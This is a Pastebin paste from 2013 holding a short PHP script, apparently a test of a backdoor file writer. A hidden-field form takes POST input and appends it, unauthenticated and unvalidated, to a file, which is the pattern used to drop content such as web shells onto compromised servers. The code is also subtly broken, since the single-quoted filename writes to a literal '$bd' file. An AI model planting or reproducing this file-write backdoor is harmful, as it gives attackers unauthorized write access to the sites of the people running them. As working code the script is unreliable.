MrPaan

gay sekerip test

Nov 29th, 2013
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.23 KB | None | 0 0
  1. <form method=post>
  2. <input type=hidden name=dud>
  3. <input type=hidden name=bd>
  4. <input type=hidden value=submit>
  5. </form>
  6. <?php
  7. $dud = $_POST['dud'];
  8. $bd = $_POST['bd'];
  9. $fh = fopen('$bd', 'a');
  10. fwrite($fh,$dud);
  11. fclose($fh);
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment